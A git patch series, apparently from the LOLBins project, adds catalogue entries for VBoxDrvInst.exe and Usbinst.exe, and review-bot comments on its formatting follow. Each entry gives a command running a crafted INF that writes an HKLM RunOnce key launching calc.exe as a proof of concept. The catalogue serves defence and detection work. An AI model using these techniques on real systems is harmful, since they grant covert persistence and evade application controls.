From 3764944412be3af722360640d1a937832b0911d0 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:18:45 -0400 Subject: [PATCH 1/4] VBoxDrvInst.exe added --- LOLBins.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LOLBins.md b/LOLBins.md index dbd3ebd..579d83a 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -87,6 +87,6 @@ If you are missing from the acknowledgement, please let me know (I did not forge # OTHER NON MICROSOFT BINARIES [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) - +[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) From 2e60d71af2db3667c3c3db64e2b6a0920a6f30c8 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:21:22 -0400 Subject: [PATCH 2/4] Create VBoxDrvInst.md --- OtherBinaries/VBoxDrvInst.md | 45 ++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 OtherBinaries/VBoxDrvInst.md diff --git a/OtherBinaries/VBoxDrvInst.md b/OtherBinaries/VBoxDrvInst.md new file mode 100644 index 0000000..8d88d5b --- /dev/null +++ b/OtherBinaries/VBoxDrvInst.md @@ -0,0 +1,45 @@ +## VBoxDrvInst.exe + +* Functions: Persistence + +``` +VBoxDrvInst.exe driver executeinf c:\temp\calc.inf +``` + +Acknowledgements: +* Pierre-Alexandre Braeken - @pabraeken + +Code sample: +* + +Resources: +* https://twitter.com/pabraeken/status/993497996179492864 + +Full path: +``` +C:\Program Files\Oracle\VirtualBox Guest Additions +``` + +Notes: +calc.inf +``` +; DRIVER.INF +; Copyright (c) Microsoft Corporation. All rights reserved. + +[Version] +Signature = "$CHICAGO$" +Class=61883 +ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} +Provider=%Msft% +DriverVer=06/21/2006,6.1.7600.16385 + +[DestinationDirs] +DefaultDestDir = 1 + +[DefaultInstall] +AddReg = CalcStart + +[CalcStart] +HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" +``` + From 9232eb43c5350aaf11b141af059711d2f9c813f1 Mon Sep 17 00:00:00 2001 
From: giMini Date: Mon, 7 May 2018 11:35:42 -0400 Subject: [PATCH 3/4] Usbinst.exe added --- LOLBins.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LOLBins.md b/LOLBins.md index 579d83a..b780923 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -88,5 +88,5 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) - +[Usbinst.exe](OtherBinaries/Usbinst.md) From de7c269e120085790f27f6ca8a3c7380008a1748 Mon Sep 17 00:00:00 2001 From: giMini Date: Mon, 7 May 2018 11:38:20 -0400 Subject: [PATCH 4/4] Create Usbinst.md --- OtherBinaries/Usbinst.md | 48 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 OtherBinaries/Usbinst.md diff --git a/OtherBinaries/Usbinst.md b/OtherBinaries/Usbinst.md new file mode 100644 index 0000000..8ad5e24 --- /dev/null +++ b/OtherBinaries/Usbinst.md @@ -0,0 +1,48 @@ +## Usbinst.exe + +* Functions: Execute + +``` +Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" + +``` + +Acknowledgements: +* Pierre-Alexandre Braeken - @pabraeken + + +Resources: +* https://twitter.com/pabraeken/status/993514357807108096 + +Full path: +``` +C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe +``` + +Notes: +calc.inf +``` +; DRIVER.INF +; Copyright (c) Microsoft Corporation. All rights reserved. + +[Version] +Signature = "$CHICAGO$" +Class=61883 +ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} +Provider=%Msft% +DriverVer=06/21/2006,6.1.7600.16385 + +[DestinationDirs] +DefaultDestDir = 1 + +[DefaultInstall] +AddReg = CalcStart + +[CalcStart] +HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" +``` + + + + +
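Review bot: Markdown will render `[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)`, `[Nvudisp.exe](OtherBinaries/Nvudisp.md)` and the new `[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)` in the `# OTHER NON MICROSOFT BINARIES` section as one run-on paragraph, because the hunk puts the new link directly under the existing ones with no list marker or blank line between them, and it also consumes the blank line that closed the section. Suggest `* [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)` (and the same marker on the two existing entries) and keeping a trailing blank line.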
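Review bot: the `Code sample:` section in the new `OtherBinaries/VBoxDrvInst.md` is an empty bullet (`* ` with nothing after it); either drop the section or point it at the INF shown under `Notes:`. `Full path:` gives only the directory `C:\Program Files\Oracle\VirtualBox Guest Additions`, whereas the sibling `Usbinst.md` gives the executable itself; append the binary name so the entry identifies the file a path-based detection or allowlist rule would match. In the INF, the `[CalcStart]` key path is written with doubled backslashes (`HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,...`); INF registry paths are normally single-backslash, so confirm this is intentional or add a comment explaining it.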
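Review bot: the same paragraph-collapse issue as in patch 1/4 applies here: `+[Usbinst.exe](OtherBinaries/Usbinst.md)` is appended directly below `[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)` with no list marker, so all four entries under `# OTHER NON MICROSOFT BINARIES` render as one line of text, and the section's closing blank line is removed again. Suggest a `* ` list item and a trailing blank line.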
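Review bot: `* Functions: Execute` in the new `OtherBinaries/Usbinst.md` disagrees with `* Functions: Persistence` in `VBoxDrvInst.md` even though both entries use the identical `calc.inf`, whose only action is an `AddReg` write to `...\CurrentVersion\RunOnce`; pick one label for both (or list both) so readers mapping these to detection categories get a consistent answer. Smaller points: the command fence contains a stray blank line after `Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"`, the `Code sample:` section present in `VBoxDrvInst.md` is missing here, the file ends with three blank `+` lines, and the full INF text is duplicated verbatim across both files and could live in one shared file that both entries reference.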